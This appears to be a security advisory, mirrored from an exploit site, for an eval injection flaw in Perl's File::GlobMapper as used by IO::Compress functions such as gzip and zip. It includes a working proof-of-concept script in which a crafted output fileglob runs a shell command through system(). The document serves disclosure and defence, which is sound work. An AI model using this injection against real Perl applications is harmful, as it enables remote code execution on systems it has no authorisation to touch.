## https://sploitus.com/exploit?id=PACKETSTORM:223138
### Summary
An eval injection vulnerability in `File::GlobMapper::_getFiles()` allows any attacker who can control the output fileglob argument passed to `IO::Compress::Gzip::gzip()`, `IO::Compress::Zip::zip()`, or any sibling function to execute arbitrary Perl code in the context of the running process.
No authentication is required. Impact is complete: confidentiality, integrity, and availability of the host process are fully compromised.
---
### Details
`File::GlobMapper::_parseOutputGlob()` builds an output filename template by wrapping the caller-supplied output pattern in Perl double-quotes and storing the result. `_getFiles()` then passes that string directly to `eval` without
any sanitisation:
**`lib/File/GlobMapper.pm:316โ321`**
```perl
$string =~ s/${noPreBS}#(\d)/\${$1}/g;
$string =~ s#${noPreBS}\*#\${inFile}#g;
$string = '"' . $string . '"'; # wrapped in double-quotes
$self->{OutputPattern} = $string; # stored verbatim โ no escaping
```
**`lib/File/GlobMapper.pm:342`**
```perl
eval "\$outFile = $self->{OutputPattern};" ; # executed โ injection point
```
`File::GlobMapper` is invoked automatically whenever **both** the input and output arguments to an `IO::Compress::*` / `IO::Uncompress::*` function are fileglob strings (delimited by `< >`). This is a documented, common calling
convention. Affected functions include `gzip`, `zip`, `bzip2`, `deflate`, `rawdeflate`, and all `IO::Uncompress::*` counterparts.
Any character that closes the surrounding double-quoted Perl string โ a literal `"`, a backtick, `${...}`, or `@{...}` โ followed by arbitrary Perl code is executed verbatim.
---
### PoC
Save as `poc.pl` and run with `perl poc.pl`:
```perl
#!/usr/bin/perl
use strict;
use warnings;
use File::Temp qw(tempdir);
use IO::Compress::Gzip qw(gzip);
my $dir = tempdir(CLEANUP => 1);
my $sentinel = "/tmp/CVE_GlobMapper_RCE_$$";
# Create a legitimate input file that the input glob will match
open my $fh, '>', "$dir/test.txt" or die $!;
print $fh "data\n";
close $fh;
my $malicious = qq(<$dir/out.gz"; system("touch $sentinel"); #>);
print "Sentinel before: ", (-e $sentinel ? "EXISTS" : "absent"), "\n";
eval { gzip "<$dir/*.txt>" => $malicious };
if (-e $sentinel) {
print "EXPLOITED โ arbitrary command executed via eval injection\n";
print "Sentinel: $sentinel\n";
unlink $sentinel;
} else {
print "Did not fire (check error: $@)\n";
}
```
**Expected output:**
```
Sentinel before: absent
EXPLOITED โ arbitrary command executed via eval injection
Sentinel: /tmp/CVE_GlobMapper_RCE_<pid>
```
Confirmed on IO-Compress 2.219 / Perl 5.40.1 / Ubuntu 26.04.
---
### Impact
This is a **remote code execution** vulnerability. Any web application, API service, CLI tool, or batch-processing pipeline that accepts user input and passes it as the output fileglob argument to any `IO::Compress::*` function is vulnerable. The injected code runs with the full privileges of the calling process.
**Who is impacted:** Developers and operators of Perl applications that use `IO::Compress::*` functions with the fileglob calling convention and where the output pattern is derived from untrusted input - such as filename templates from web forms, REST API parameters, CLI arguments, or configuration files controlled by non-privileged users.
In setuid or privileged-daemon contexts, exploitation yields code execution at the elevated privilege level. The bug has been present since the initial release of `File::GlobMapper` (โ 2005) and is present on every Linux distribution that ships the `perl` package.
### References
- https://nvd.nist.gov/vuln/detail/CVE-2026-48962
- https://github.com/pmqs/IO-Compress/commit/f2db247bf90d4cc7ee2710be384946081f3b4610.patch
- https://github.com/pmqs/IO-Compress/issues/73
- https://metacpan.org/release/PMQS/IO-Compress-2.220/changes
- http://www.openwall.com/lists/oss-security/2026/05/27/4
- https://github.com/advisories/GHSA-q6wx-vhvq-x7h6